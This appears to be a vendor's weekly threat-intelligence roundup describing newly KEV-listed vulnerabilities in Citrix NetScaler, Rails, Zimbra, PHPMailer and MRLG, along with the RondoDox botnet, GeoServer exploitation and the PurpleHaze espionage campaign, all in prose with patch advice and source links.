In a sharp reminder that outdated software flaws continue to pose real-world threats, CISA added five vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog this week, four of which are legacy issues impacting widely used technologies PHPMailer, Zimbra Collaboration Suite, Multi-Router Looking Glass, and Ruby on Rails, including one dating back nearly a decade.  The fifth and most recent addition is a flaw in Citrix NetScaler ADC and Gateway, which has public proof-of-concept and is actively exploited in the wild. Despite long-standing patches for the legacy flaws, their exploitation underscores the persistent risks posed by unpatched systems across sectors.

At the same time, botnet families like EnemyBot, Sysrv-k, Andoryu, and Androxgh0st aggressively targeted unpatched vulnerabilities in platforms such as GitLab, Cloud Gateway, and various PHP-based services. Meanwhile, IoT-focused botnets including Bashlite, BrickerBot, Tsunami, and Mirai intensified their activity, launching widespread attacks against exposed Eir D1000 devices and rapidly compromising internet-facing systems.

This week, cyber espionage operations resurfaced prominently, with threat actors actively exploiting known vulnerabilities across industrial and enterprise systems. Fortinet revealed a stealthy botnet operation, RondoDox, targeting flaws in TBK DVRs and Four-Faith routers. AhnLab Security Intelligence Center (ASEC) reported ongoing abuse of a remote code execution flaw in GeoServer to deploy NetCat reverse shells and XMRig CoinMiners. Meanwhile, SentinelLabs uncovered a high-profile cyber espionage operation attributed to China-nexus actors under the PurpleHaze cluster, leveraging vulnerabilities in Ivanti, ConnectWise, and GeoServer GeoTools to target government, media, and cybersecurity sectors.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-5777
An Out-of-Bounds Read Vulnerability in the Citrix NetScaler ADC and Gateway has raised critical security concerns, earning a CVSS Score of 9.3. Now informally dubbed " Citrix Bleed 2", this flaw arises from insufficient input validation, potentially enabling threat actors to exfiltrate sensitive information or gain unauthorized access to affected systems. A publicly available proof-of-concept (PoC) has further escalated the urgency of this issue. Its recent addition to the CISA Known Exploited Vulnerabilities (KEV) catalog highlights ongoing exploitation in the wild. Organizations using vulnerable versions are strongly advised to apply the latest patches without delay to mitigate the risk of compromise.

CVE-2019-5418
A Path Traversal Vulnerability in the Ruby on Rails' Action View component has been added to the CISA KEV catalog, signaling confirmed in-the-wild exploitation. Rated with a high CVSS Score of 7.5, this flaw allows attackers to manipulate file paths and potentially access arbitrary files on the system. Originally addressed in March 2019, the issue was patched across multiple Rails versions, including 4.2.11.1, 5.0.7.2, 5.1.6.2, 5.2.2.1, and 6.0.0.beta3 and later. With proof-of-concept code publicly available, the renewed attention underscores the importance of applying long-standing patches, especially for legacy systems still relying on older Rails deployments.

CVE-2019-9621
A Server-Side Request Forgery (SSRF) Vulnerability in the ProxyServlet component of Synacor's Zimbra Collaboration Suite has been recently added to the CISA KEV catalog, highlighting ongoing exploitation activity. With a high CVSS Score of 7.5, this flaw allows attackers to manipulate Zimbra servers into making unauthorized requests to internal or external systems, potentially leading to sensitive data exposure or remote code exposure. Zimbra addressed the issue through multiple patch releases, including 8.7.11 Patch 11, 8.8.9 Patch10, 8.8.10 Patch8, 8.8.11 Patch4, and the full release of 8.8.12 in April 2019. This vulnerability gained notable attention in September 2023 when Trend Micro linked its exploitation to the China-based threat group Earth Lusca, further emphasizing the threat's real-world impact.

CVE-2016-10033
A Command Injection Vulnerability in PHPMailer affects versions prior to 5.2.18, specifically within the mail()function of the class.phpmailer.php script. This flaw allows remote attackers to execute arbitrary code within the application's context by injecting malicious parameters into email fields. Even failed exploitation attempts can lead to denial-of-service conditions. The issue stems from improper sanitization of user-supplied inputs before passing them to the underlying sendmail process. This vulnerability was addressed back in 2016 with the release of PHPMailer version 5.2.18. Despite being patched years ago, it has now been added to the CISA KEV catalog, signaling active exploitation in the wild.

CVE-2014-3931
A Buffer Overflow Vulnerability in Multi-Router Looking Glass (MRLG) affects versions prior to 5.5.0, enabling remote attackers to perform arbitrary memory writes and trigger memory corruption. This flaw, rooted in outdated web scripting practices and direct telnet/SSH access to backbone routers, significantly endangers network infrastructure. Looking Glass applications commonly written in PHP or Perl during the 1990s and early 2000s are still deployed by many Autonomous Systems (ASes) to provide limited public access for diagnosing BGP routing issues. These legacy tools represent a high-risk attack surface due to their privileged network access and infrequent maintenance. The vulnerability was patched in 2014, with the release of MRLG version 5.5.0, yet its recent addition to the CISA KEV catalog, highlights ongoing real-world exploitation, even a decade later.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

RondoDox Botnet campaign

Fortinet researchers have uncovered a sophisticated malware campaign exploiting known vulnerabilities in TBK digital video recorders (DVRs) and Four-Faith industrial routers to build a stealthy botnet dubbed RondoDox. The operation leverages CVE-2024-3721, a command injection flaw in TBK DVR-4104 and DVR-4216 models, and CVE-2024-12856, and OS Command Injection flaw affecting Four-faith router models F3X24 and F3X36. Initial signs of RondoDox activity were observed in September 2024, marked by the discovery of an ELF binary designed to blend into legitimate network traffic by impersonating gaming or VPN traffic patterns.  

What sets RondoDox apart is its strategic use of compromised devices, not as traditional DDoS bots, but as proxy infrastructure to mask malicious activity. These hijacked systems are weaponized to conceal command-and-control (C2) traffic, conduct multi-stage fraud operations, and bolster DDoS-for-hire schemes that mix financial motives with disruptive attacks.  

Technical analysis reveals that RondoDox initially targeted Linux environments running on ARM and MIPS architectures. However, the threat has since expanded its reach using a shell script-based downloader capable of infecting a wide range of Linux-based systems, including Intel 80386, x86-64, AArch64, MC68000, PowerPC, SuperH, MIPS R3000, and ARCompact signaling a rapidly evolving and architecture-agnostic botnet threat.

CVE-2024-36401
The AhnLab Security Intelligence Center (ASEC) has issued a new alert regarding the continued exploitation of a remote code execution vulnerability in GeoServer, identified as CVE-2024-36401. This flaw is actively being targeted in live attacks across both Windows and Linux systems. ASEC reports that threat actors are leveraging the vulnerability to deploy NetCat-based reverse shells for remote access and XMRig CoinMiners to abuse system resources for illicit cryptocurrency mining. In one observed campaign targeting South Korean infrastructure, attackers exploited unpatched GeoServer instances running on Windows by executing PowerShell commands to fetch and run malicious scripts. These scripts were responsible for installing NetCat and XMRig, enabling persistent access and unauthorized resource consumption. ASEC confirmed that unpatched GeoServer systems remain under continuous attack, with widespread scanning activity observed as attackers hunt for exploitable instances.

PurpleHaze espionage campaign

Between July 2024 and March 2025, SentinelLabs uncovered a highly targeted cyber espionage campaign attributed to China-linked threat actors operating under the cluster known as PurpleHaze, with overlaps to known groups APT15 and UNC5174. This campaign involved reconnaissance and intrusions across more than 70 global organizations, including entities in government, manufacturing, finance, media, logistics, telecommunications, and cybersecurity sectors. A notable part of this operation included reconnaissance activity against SentinelOne's own internet-facing infrastructure in October 2024, where threat actors conducted controlled scans to evaluate exposed systems likely as a precursor to more aggressive follow ups.  

The technical core of the PurpleHaze operation relied heavily on exploitation of known vulnerabilities. The attackers leveraged CVE-2024-8963 and CVE-2024-8190, both affecting Ivanti Connect Secure, just days before their public disclosure to establish an initial foothold. They further capitalized on CVE-2023-46747 in F5 BIG-IP devices and CVE-2024-1709 in ConnectWise ScreenConnect to escalate access and maintain persistence across compromised environments. These CVEs played a crucial role in enabling threat actors to infiltrate target networks quickly and discreetly. Malware deployment was equally strategic. PurpleHaze actors utilized GoReShell. It communicated with command-and-control servers via SSH over WebSocket, effectively blending into legitimate traffic. The attackers maintained a distributed command-and-control architecture that included assets hosted in multiple countries.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/07/07/cisa-adds-four-known-exploited-vulnerabilities-catalog
2. https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-adds-one-known-exploited-vulnerability-catalog  
3. https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/  
4. https://asec.ahnlab.com/en/88917/  
5. https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
6. https://levelblue.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers  
7. https://blog.apnic.net/2021/12/23/preparing-for-the-next-large-scale-iot-botnet-attack/